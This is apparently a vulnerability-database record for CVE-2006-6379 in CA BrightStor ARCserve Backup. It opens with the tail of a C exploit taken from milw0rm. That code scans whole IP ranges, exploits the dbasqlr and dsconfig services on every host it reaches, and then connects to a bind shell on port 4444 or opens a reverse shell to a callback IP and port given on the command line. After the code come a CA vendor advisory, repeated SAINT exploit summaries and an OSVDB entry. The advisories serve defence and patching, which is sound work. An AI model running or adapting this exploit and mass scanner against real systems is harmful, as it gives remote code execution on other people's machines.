)\r\n\t\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\tif ( exploit_dbasqlr ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )\r\n\t\t\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\r\n\t\t\t\t\t\t\t\t\t\t\t\texit ( 1 );\r\n\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t\tconnect_to_bindshell ( scan_ip, 4444 );\r\n\t\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\tif ( exploit_dsconfig ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )\r\n\t\t\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\r\n\t\t\t\t\t\t\t\t\t\t\t\texit ( 1 );\r\n\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t\tconnect_to_bindshell ( scan_ip, 4444 );\r\n\t\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\tcase 1:\r\n\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\tif ( port == 6070 )\r\n\t\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\txoredcbip = inet_addr ( argp->lip ) ^ ( unsigned long ) 0x99999999;\r\n\t\t\t\t\t\t\t\t\t\t\txoredcbport = htons ( argp->lport ) ^ ( unsigned short ) 0x9999;\r\n\t\t\t\t\t\t\t\t\t\t\tif ( exploit_dbasqlr ( s, xoredcbip, xoredcbport, 0 ) == 1 )\r\n\t\t\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\r\n\t\t\t\t\t\t\t\t\t\t\t\texit ( 1 );\r\n\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t\tstart_reverse_handler ( argp->lport );\r\n\t\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\txoredcbip = inet_addr ( argp->lip ) ^ ( unsigned long ) 0x99999999;\r\n\t\t\t\t\t\t\t\t\t\t\txoredcbport = htons ( argp->lport ) ^ ( unsigned short ) 0x9999;\r\n\t\t\t\t\t\t\t\t\t\t\tif ( exploit_dsconfig ( s, xoredcbip, xoredcbport, 0 ) == 1 )\r\n\t\t\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\r\n\t\t\t\t\t\t\t\t\t\t\t\texit ( 1 );\r\n\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t\tstart_reverse_handler ( argp->lport );\r\n\t\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\tcase 1:\r\n\t\t\t\t\t\t\tprintf ( \"[%s:%d] \" RED \"closed\" NORMAL \"\\n\", scan_ip, port );\r\n\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\tdefault:\r\n\t\t\t\t\t\t\tprintf ( \"[%s:%d] \" RED \"closed\" NORMAL \"\\n\", scan_ip, port );\r\n\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t}\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t\tcase -1:\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf ( \"fork failed!\\n\");\r\n\t\t\t\t\texit ( 1 );\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t\tdefault:\r\n\t\t\t\t{\r\n\t\t\t\t\tif ( i > MAX_CHILDS - 2 )\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\twait ( &status );\r\n\t\t\t\t\t\ti--;\r\n\t\t\t\t\t}\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tif ( ip1 == a && ip2 == b && ip3 == c && ip4 == d )\r\n\t\t\t{\r\n\t\t\t\tclose ( fd );\r\n\t\t\t\tprintf ( \"\\noO---[ scan completed ]---Oo\\n\\n\" );\r\n\t\t\t\texit ( 0 );\r\n\t\t\t}\r\n\t\t}\r\n\t\tip4 = 1;\r\n\t\tip3++;\r\n\t}\r\n}\r\n\r\nvoid\r\nusage ( char* name )\r\n{\r\n\tint i;\r\n\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \"Note: all switches have to be specified!\\n\" );\r\n\tprintf ( \"You can choose between bind and cb shellcode later!\\n\" );\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \"Usage: %s -t <tip> -l <cbip> -p <cbport>\\n\", name );\r\n\tprintf ( \"\\n\" );\r\n\texit ( 1 );\r\n}\r\n\r\nint\r\nmain ( int argc, char* argv[] )\r\n{\r\n\tint s, action, vuln, sc;\r\n\tunsigned long xoredcbip;\r\n\tunsigned short xoredcbport;\r\n\targs myargs;\r\n\r\n\tsystem ( \"clear\" );\r\n\theader ();\r\n\tparse_arguments ( argc, argv, &myargs );\r\n\tif ( !isip ( myargs.tip ) )\r\n\t{\r\n\t\tprintf ( \"Invalid Target IP!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tif ( !isip ( myargs.lip ) )\r\n\t{\r\n\t\tprintf ( \"Invalid Connect Back IP!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\taction = select_action ();\r\n\tif ( !action )\r\n\t\tstart_scanner ( &myargs );\r\n\tvuln = select_vulnerability ();\r\n\tsc = select_shellcode ();\r\n\tswitch ( vuln )\r\n\t{\r\n\t\tcase 0:\r\n\t\t{\r\n\t\t\ts = connect_to_remote_host ( myargs.tip, PORT_DBASQLR );\r\n\t\t\tswitch( sc )\r\n\t\t\t{\r\n\t\t\t\tcase 0:\r\n\t\t\t\t{\r\n\t\t\t\t\tif ( exploit_dbasqlr ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\r\n\t\t\t\t\t\texit ( 1 );\r\n\t\t\t\t\t}\r\n\t\t\t\t\tconnect_to_bindshell ( myargs.tip, 4444 );\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t\tcase 1:\r\n\t\t\t\t{\r\n\t\t\t\t\txoredcbip = inet_addr ( myargs.lip ) ^ ( unsigned long ) 0x99999999;\r\n\t\t\t\t\txoredcbport = htons ( myargs.lport ) ^ ( unsigned short ) 0x9999;\r\n\t\t\t\t\tif ( exploit_dbasqlr ( s, xoredcbip, xoredcbport, 0 ) == 1 )\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\r\n\t\t\t\t\t\texit ( 1 );\r\n\t\t\t\t\t}\r\n\t\t\t\t\tstart_reverse_handler ( myargs.lport );\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\tbreak;\r\n\t\t}\r\n\t\tcase 1:\r\n\t\t{\r\n\t\t\ts = connect_to_remote_host ( myargs.tip, PORT_DSCONFIG );\r\n\t\t\tswitch( sc )\r\n\t\t\t{\r\n\t\t\t\tcase 0:\r\n\t\t\t\t{\r\n\t\t\t\t\tif ( exploit_dsconfig ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\r\n\t\t\t\t\t\texit ( 1 );\r\n\t\t\t\t\t}\r\n\t\t\t\t\tconnect_to_bindshell ( myargs.tip, 4444 );\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t\tcase 1:\r\n\t\t\t\t{\r\n\t\t\t\t\txoredcbip = inet_addr ( myargs.lip ) ^ ( unsigned long ) 0x99999999;\r\n\t\t\t\t\txoredcbport = htons ( myargs.lport ) ^ ( unsigned short ) 0x9999;\r\n\t\t\t\t\tif ( exploit_dsconfig ( s, xoredcbip, xoredcbport, 0 ) == 1 )\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\r\n\t\t\t\t\t\texit ( 1 );\r\n\t\t\t\t\t}\r\n\t\t\t\t\tstart_reverse_handler ( myargs.lport );\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\tbreak;\r\n\t\t}\r\n\t}\r\n}\n\n// milw0rm.com [2005-08-03]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1132/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:20", "bulletinFamily": "software", "description": "\r\nTitle: CAID 34846: CA BrightStor ARCserve Backup Discovery Service \r\nBuffer Overflow Vulnerability\r\n\r\nCA Vulnerability ID (CAID): 34846\r\n\r\nCA Advisory Date: 2006-12-07\r\n\r\nDiscovered By: Assurent Secure Technologies (assurent.com)\r\n\r\nImpact: Remote attacker can execute arbitrary code.\r\n\r\nSummary: CA BrightStor ARCserve Backup contains a buffer overflow \r\nthat allows remote attackers to execute arbitrary code with local \r\nSYSTEM privileges on Windows. This issue affects the BrightStor \r\nBackup Discovery Service in multiple BrightStor ARCserve Backup \r\napplication agents and the Base product.\r\n\r\nMitigating Factors: None.\r\n\r\nSeverity: CA has given this vulnerability a High risk rating.\r\n\r\nAffected Products:\r\nBrightStor Products:\r\n- BrightStor ARCserve Backup r11.5 SP1 and below (SP2 does not \r\n have this vulnerability ; please apply r11.5 SP2)\r\n- BrightStor ARCserve Backup r11.1\r\n- BrightStor ARCserve Backup for Windows r11\r\n- BrightStor Enterprise Backup 10.5\r\n- BrightStor ARCserve Backup v9.01 \r\nCA Protection Suites r2:\r\n- CA Server Protection Suite r2\r\n- CA Business Protection Suite r2\r\n- CA Business Protection Suite for Microsoft Small Business Server \r\n Standard Edition r2\r\n- CA Business Protection Suite for Microsoft Small Business Server \r\n Premium Edition r2\r\n\r\nAffected platforms:\r\nMicrosoft Windows\r\n\r\nStatus and Recommendation: \r\nCustomers with vulnerable versions of BrightStor ARCserve Backup \r\nproducts should upgrade to the latest versions which are available \r\nfor download from http://supportconnect.ca.com.\r\nSolution Document Reference APARs: \r\nQO84609, QI82917, QO84611, QO84610\r\n\r\nDetermining if you are affected: \r\nFor a list of updated files, and instructions on how to verify \r\nthat the security update was fully applied, please review the \r\nInformational Solution referenced in the appropriate Solution \r\nDocument.\r\n\r\nReferences (URLs may wrap): \r\nCA SupportConnect:\r\nhttp://supportconnect.ca.com/\r\nCA SupportConnect Security Notice for this vulnerability:\r\nImportant Security Notice for BrightStor ARCserve Backup\r\nhttp://supportconnectw.ca.com/public/storage/infodocs/babsecurity-notice.asp\r\nSolution Document Reference APARs: \r\nQO84609, QI82917, QO84611, QO84610\r\nCA Security Advisor Research Blog postings:\r\nhttp://www3.ca.com/blogs/posting.aspx?id=90744&pid=96149&date=2006/12\r\nCAID: 34846\r\nCAID Advisory links: \r\nhttp://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34846\r\nDiscoverer: Assurent Secure Technologies\r\nhttp://www.assurent.com/\r\nCVE Reference: CVE-2006-6379\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6379\r\nOSVDB Reference: OSVDB IDs: 30775\r\nhttp://osvdb.org/30775\r\n\r\nChangelog for this advisory:\r\nv1.0 - Initial Release\r\n\r\nCustomers who require additional information should contact CA \r\nTechnical Support at http://supportconnect.ca.com.\r\n\r\nFor technical questions or comments related to this advisory,\r\nplease send email to vuln@ca.com, or contact me directly.\r\n\r\nIf you discover a vulnerability in CA products, please report\r\nyour findings to vuln@ca.com, or utilize our "Submit a \r\nVulnerability" form.\r\nURL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx\r\n\r\n\r\nRegards,\r\nKen Williams ; 0xE2941985\r\nDirector, CA Vulnerability Research\r\n\r\nCA, One CA Plaza. Islandia, NY 11749\r\n \r\nContact http://www3.ca.com/contact/\r\nLegal Notice http://www3.ca.com/legal/\r\nPrivacy Policy http://www3.ca.com/privacy/\r\nCopyright \u00a9 2006 CA. All rights reserved.", "modified": "2006-12-08T00:00:00", "published": "2006-12-08T00:00:00", "id": "SECURITYVULNS:DOC:15338", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:15338", "title": "[CAID 34846]: CA BrightStor ARCserve Backup Discovery Service Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "saint": [{"lastseen": "2019-05-29T17:19:54", "bulletinFamily": "exploit", "description": "Added: 12/08/2006 \nCVE: [CVE-2006-6379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6379>) \nBID: [21502](<http://www.securityfocus.com/bid/21502>) \nOSVDB: [30775](<http://www.osvdb.org/30775>) \n\n\n### Background\n\nThe [BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) server includes a discovery service which listens on ports 41523/TCP and 41524/UDP. \n\n### Problem\n\nA buffer overflow vulnerability in the `**ASBRDCST.DLL**` library allows remote attackers to execute arbitrary commands by sending a specially crafted command of type 9b to the discovery service. \n\n### Resolution\n\nApply a fix from [Computer Associates](<http://supportconnectw.ca.com/public/storage/infodocs/babsecurity-notice.asp>). \n\n### References\n\n<http://supportconnectw.ca.com/public/storage/infodocs/babsecurity-notice.asp> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup 11.1 SP2. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2006-12-08T00:00:00", "published": "2006-12-08T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_disc_9b", "id": "SAINT:53FCF127771E89CD8C76DA47C3BF6B4B", "title": "BrightStor ARCserve Discovery service 9b command buffer overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "description": "Added: 12/08/2006 \nCVE: [CVE-2006-6379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6379>) \nBID: [21502](<http://www.securityfocus.com/bid/21502>) \nOSVDB: [30775](<http://www.osvdb.org/30775>) \n\n\n### Background\n\nThe [BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) server includes a discovery service which listens on ports 41523/TCP and 41524/UDP. \n\n### Problem\n\nA buffer overflow vulnerability in the `**ASBRDCST.DLL**` library allows remote attackers to execute arbitrary commands by sending a specially crafted command of type 9b to the discovery service. \n\n### Resolution\n\nApply a fix from [Computer Associates](<http://supportconnectw.ca.com/public/storage/infodocs/babsecurity-notice.asp>). \n\n### References\n\n<http://supportconnectw.ca.com/public/storage/infodocs/babsecurity-notice.asp> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup 11.1 SP2. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2006-12-08T00:00:00", "published": "2006-12-08T00:00:00", "id": "SAINT:8940368C56AF9FD6C894F29E6AE5EFBF", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_disc_9b", "type": "saint", "title": "BrightStor ARCserve Discovery service 9b command buffer overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:31", "bulletinFamily": "exploit", "description": "Added: 12/08/2006 \nCVE: [CVE-2006-6379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6379>) \nBID: [21502](<http://www.securityfocus.com/bid/21502>) \nOSVDB: [30775](<http://www.osvdb.org/30775>) \n\n\n### Background\n\nThe [BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) server includes a discovery service which listens on ports 41523/TCP and 41524/UDP. \n\n### Problem\n\nA buffer overflow vulnerability in the `**ASBRDCST.DLL**` library allows remote attackers to execute arbitrary commands by sending a specially crafted command of type 9b to the discovery service. \n\n### Resolution\n\nApply a fix from [Computer Associates](<http://supportconnectw.ca.com/public/storage/infodocs/babsecurity-notice.asp>). \n\n### References\n\n<http://supportconnectw.ca.com/public/storage/infodocs/babsecurity-notice.asp> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup 11.1 SP2. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2006-12-08T00:00:00", "published": "2006-12-08T00:00:00", "id": "SAINT:AFD0DC6204D54294BA0B227874738615", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_disc_9b", "title": "BrightStor ARCserve Discovery service 9b command buffer overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:27", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://supportconnectw.ca.com/public/storage/infodocs/babsecurity-notice.asp\nSecurity Tracker: 1017356\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-12/0146.html\nISS X-Force ID: 30791\nFrSIRT Advisory: ADV-2006-4910\n[CVE-2006-6379](https://vulners.com/cve/CVE-2006-6379)\nBugtraq ID: 21502\n", "modified": "2006-12-08T00:00:00", "published": "2006-12-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:30775", "id": "OSVDB:30775", "title": "CA BrightStor ARCserve Backup Discovery Service Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
